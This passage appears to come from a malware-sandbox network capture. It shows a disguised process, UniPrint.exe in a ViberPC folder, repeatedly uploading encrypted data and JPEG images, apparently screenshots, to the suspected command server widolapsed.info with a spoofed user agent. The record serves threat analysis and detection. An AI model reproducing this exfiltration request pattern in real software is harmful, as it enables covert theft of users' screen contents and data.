                                                                                                      2021-09-15 11:46:36 UTC2547OUTData Raw: 51 9a 41 61 68 a4 cd 26 69 dc 2c 2d 14 d2 69 33 4a e5 58 76 68 a6 d2 e6 95 c2 c2 d1 4d cd 19 a0 2c 48 3a 51 48 0d 15 44 81 a4 cd 06 9b 52 d9 49 0b 9a 29 28 34 5c 02 8a 4a 29 0c 75 14 94 b4 c4 55 a5 a2 8a c4 d8 28 a2 8a 00 28 a2 8a 00 28 a2 92 80 16 8a 28 a0 02 8a 28 a0 02 8a 28 a6 02 d1 49 45 00 2d 25 2d 14 00 94 51 45 00 14 51 45 00 2d 14 94 50 02 d2 d3 69 68 10 b4 94 51 40 0b 9a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 16 8a 4a 5a 62 0a 5a 4a 29 80 51 45 14 80 28 a2 8a 00 28 a2 8a 00 29 69 28 a0 05 a2 92 96 98 05 14 51 40 85 a2 92 8a 00 5a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 0a 28 a2 98 85 a4 a2 8a 00 5a 28 a2 80 0a 28 a2 80 0a 28 a2 80 16 8a 41 4b 4c 41 4b 49 46 68 01 68 a4 cd 14 00 b4 66 92 8a 00 5c d1 49 4b 40 82 8a 28 a0 02 96 92 96 98 05 2d 25 14 00 bd
                                                                                                      Data Ascii: QAah&i,-i3JXvhM,H:QHDRI)(4\J)uU((((((IE-%-QEQE-PihQ@)(Z(JZbZJ)QE(()i(Q@Z)(Z((Z(((AKLAKIFhhf\IK@(-%
                                                                                                      2021-09-15 11:46:36 UTC2558OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 37 32 33 33 33 39 36 37 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------572333967--
                                                                                                      2021-09-15 11:46:36 UTC2558INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:36 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=b1931c04830111111aea6eb3571371f63d3f729b5027d6c58c11874ad7a7a773; expires=Thu, 15-Sep-2022 11:46:36 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:36 UTC2558INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      33192.168.2.34982445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:38 UTC2559OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76592
                                                                                                      Content-Type: multipart/form-data; boundary=--------3756762824
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:38 UTC2559OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 37 35 36 37 36 32 38 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3756762824Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:38 UTC2559OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 c8 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:38 UTC2559OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:38 UTC2575OUTData Raw: bd 0c b3 e2 91 cb 8b d9 14 29 69 29 6b d9 38 82 8c 51 45 02 0c 57 a7 fc 29 e3 49 be ff 00 ae e3 ff 00 41 af 30 af 4e f8 55 ff 00 20 9b ef fa ee 3f f4 1a ce af c2 69 4f e2 3b aa 4a c9 b1 b5 81 f4 9b 6b 9b 99 ee b2 d0 2c 92 39 bb 94 0f ba 09 3f 7a ac a5 85 ac 91 ab c7 35 d3 2b 0c 82 2f 25 c1 1f f7 d5 62 e3 14 f7 fc 3f e0 9a 29 49 ad bf 1f f8 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61
                                                                                                      Data Ascii: )i)k8QEW)IA0NU ?iO;Jk,9?z5+/%b?)IMR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((a
                                                                                                      2021-09-15 11:46:38 UTC2591OUTData Raw: 80 29 69 29 45 02 14 52 d2 52 d2 10 b5 62 06 e8 2a b5 4d 6f f7 aa 25 b1 a5 27 69 1a fa b1 c7 86 87 bb 57 12 fd 6b b3 d6 78 f0 d2 7f bd 5c 5b 9e 6b 1c 2f c0 fd 4f 52 bf c6 bd 0e f4 71 e1 db 2f a0 aa 39 ab ad c7 87 ec 47 fb 23 f9 55 1a e7 a3 d7 d4 d3 10 fd e5 e8 2e 68 cd 25 25 6c 73 dc 76 69 43 53 45 14 58 13 1f 93 4e dc 7d 69 82 96 a5 a2 d3 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e
                                                                                                      Data Ascii: )i)ERRb*Mo%'iWkx\[k/ORq/9G#U.h%%lsviCSEXN}id81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn
                                                                                                      2021-09-15 11:46:38 UTC2607OUTData Raw: db a4 67 f2 ab 76 9a 6d c7 9a 18 a1 eb 51 b6 bb 74 7e e8 45 fa 0a 62 6a b7 8f 22 e6 53 82 7b 0a 99 2a cd 1a 53 54 23 25 bb 2e 78 cd 76 c3 6a 0f a5 72 fa 7f fc 84 6d ff 00 eb a2 d7 4d e3 12 5a da d0 9e a5 6b 99 d3 ff 00 e4 23 6f ff 00 5d 07 f3 a5 87 fe 01 d7 5b f8 c7 a1 6a 29 6e 66 0d 34 a1 4e 3a 55 23 36 9b 1f 57 26 ab 78 90 91 7a b8 3f c3 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b 9a 5c d2 2d 31 d9 a7 03 51 d3 c5 26 8a 4c 7d 28 a6 8a 5a 93 44 c7 53 85 30 1a 76 45 22 93
                                                                                                      Data Ascii: gvmQt~Ebj"S{*ST#%.xvjrmMZk#o][j)nf4N:U#6W&xz?X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc\-1Q&L}(ZDS0vE"
                                                                                                      2021-09-15 11:46:38 UTC2623OUTData Raw: 14 b4 94 53 00 a2 8a 29 00 51 45 14 00 51 45 14 00 52 d2 51 40 0b 45 25 2d 30 0a 28 a2 81 0b 45 25 14 00 b4 52 51 40 0b 45 25 14 00 b4 51 45 00 14 51 45 31 0b 49 45 14 00 b4 51 45 00 14 51 45 00 14 51 45 00 2d 14 82 96 98 82 96 92 8c d0 02 d1 49 9a 28 01 68 cd 25 14 00 b9 a2 92 96 81 05 14 51 40 05 2d 25 2d 30 0a 5a 4a 28 01 7b d1 45 14 00 51 49 4b 4c 05 a2 92 8a 04 2d 14 94 b4 00 b4 52 51 4c 42 d1 45 14 00 b4 94 66 8a 00 5a 28 a2 80 0a 5a 4a 28 01 68 14 94 b4 c4 2d 19 a4 a2 98 85 cd 19 a4 a2 80 1d 9a 29 b4 b4 5c 2c 2d 19 a4 cd 26 68 b8 58 76 68 cd 37 34 51 70 b0 fc d1 9a 6d 19 a7 71 58 76 69 33 4d a5 cd 2b 8e c2 e6 97 34 da 4c d1 70 b0 ea 33 49 9a 28 b8 58 76 69 0d 25 19 a7 70 b0 51 49 45 20 16 8c d2 51 40 58 5c d1 4d cd 19 a5 71 d8 5a 33 4d cd 19 a2 e1
                                                                                                      Data Ascii: S)QEQERQ@E%-0(E%RQ@E%QEQE1IEQEQEQE-I(h%Q@-%-0ZJ({EQIKL-RQLBEfZ(ZJ(h-)\,-&hXvh74QpmqXvi3M+4Lp3I(Xvi%pQIE Q@X\MqZ3M
                                                                                                      2021-09-15 11:46:38 UTC2634OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 37 35 36 37 36 32 38 32 34 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3756762824--
                                                                                                      2021-09-15 11:46:38 UTC2634INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:38 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=aa91a2eb5bead98ff02ea94f8df9e3120d4fc8a6fd34c1e07024113508dd1e04; expires=Thu, 15-Sep-2022 11:46:38 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:38 UTC2634INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      34192.168.2.34982545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:40 UTC2634OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76612
                                                                                                      Content-Type: multipart/form-data; boundary=--------4010773262
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:40 UTC2634OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 30 31 30 37 37 33 32 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4010773262Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:40 UTC2634OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 fc d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:40 UTC2634OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:40 UTC2650OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:40 UTC2666OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:40 UTC2682OUTData Raw: 70 2f fa ab 58 c7 d6 8f 69 51 ed 10 f6 14 d6 f2 2a 2d a4 ed d2 33 f9 55 bb 4d 36 e3 cd 0c 50 f5 a8 db 5d ba 3f 74 22 fd 05 31 35 5b c7 91 73 29 c1 3d 85 4c 95 66 8d 29 aa 11 92 dd 97 3c 66 bb 61 b5 07 d2 b9 7d 3f fe 42 36 ff 00 f5 d1 6b a6 f1 89 2d 6d 68 4f 52 b5 cc e9 ff 00 f2 11 b7 ff 00 ae 83 f9 d2 c3 ff 00 00 eb ad fc 63 d0 b5 14 b7 33 06 9a 50 a7 1d 2a 91 9b 4d 8f ab 93 55 bc 48 48 bd 5c 1f e1 ac 5e bd eb 0a 14 39 a0 9b 64 e2 71 9c 95 1c 54 4e 80 ea 7a 7a 7d c8 89 a6 1d 72 25 ff 00 57 6e 2b 0a 8a dd 61 61 d4 e4 78 fa bd 0d 86 d7 e6 fe 08 d4 54 0f ac dd b7 46 c7 d2 b3 a8 aa 58 7a 6b a1 93 c5 d6 7d 4b 6d a8 5c bf de 95 bf 3a 6f 9d 23 75 72 7f 1a af 4e 5a bf 67 15 b2 25 56 9b dd 92 ee 27 a9 34 b9 a6 8a 5a 56 2d 49 b1 d4 e1 4d cd 2e 69 16 98 ec d3 81 a8
                                                                                                      Data Ascii: p/XiQ*-3UM6P]?t"15[s)=Lf)<fa}?B6k-mhORc3P*MUHH\^9dqTNzz}r%Wn+aaxTFXzk}Km\:o#urNZg%V'4ZV-IM.i
                                                                                                      2021-09-15 11:46:40 UTC2698OUTData Raw: 0b 9a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 16 8a 4a 5a 62 0a 5a 4a 29 80 51 45 14 80 28 a2 8a 00 28 a2 8a 00 29 69 28 a0 05 a2 92 96 98 05 14 51 40 85 a2 92 8a 00 5a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 0a 28 a2 98 85 a4 a2 8a 00 5a 28 a2 80 0a 28 a2 80 0a 28 a2 80 16 8a 41 4b 4c 41 4b 49 46 68 01 68 a4 cd 14 00 b4 66 92 8a 00 5c d1 49 4b 40 82 8a 28 a0 02 96 92 96 98 05 2d 25 14 00 bd e8 a2 8a 00 28 a4 a5 a6 02 d1 49 45 02 16 8a 4a 5a 00 5a 29 28 a6 21 68 a2 8a 00 5a 4a 33 45 00 2d 14 51 40 05 2d 25 14 00 b4 0a 4a 5a 62 16 8c d2 51 4c 42 e6 8c d2 51 40 0e cd 14 da 5a 2e 16 16 8c d2 66 93 34 5c 2c 3b 34 66 9b 9a 28 b8 58 7e 68 cd 36 8c d3 b8 ac 3b 34 99 a6 d2 e6 95 c7 61 73 4b 9a 6d 26 68 b8 58 75 19 a4 cd 14 5c 2c 3b 34 86 92 8c d3 b8 58 28 a4 a2 90 0b 46
                                                                                                      Data Ascii: )(Z(JZbZJ)QE(()i(Q@Z)(Z((Z(((AKLAKIFhhf\IK@(-%(IEJZZ)(!hZJ3E-Q@-%JZbQLBQ@Z.f4\,;4f(X~h6;4asKm&hXu\,;4X(F
                                                                                                      2021-09-15 11:46:40 UTC2709OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 30 31 30 37 37 33 32 36 32 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4010773262--
                                                                                                      2021-09-15 11:46:42 UTC2709INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:40 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=103ccd40d7a4cb1c8b51842a66271d7b87675ab989464d8895780fd21c08c222; expires=Thu, 15-Sep-2022 11:46:40 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:42 UTC2709INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      35192.168.2.34982645.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:43 UTC2709OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76597
                                                                                                      Content-Type: multipart/form-data; boundary=--------1730318477
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:43 UTC2710OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 33 30 33 31 38 34 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1730318477Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:43 UTC2710OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e7 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:46:43 UTC2710OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
